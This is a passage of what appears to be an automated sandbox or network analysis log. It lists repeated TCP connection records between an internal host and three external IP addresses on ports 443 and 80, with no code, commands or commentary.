                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.161:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
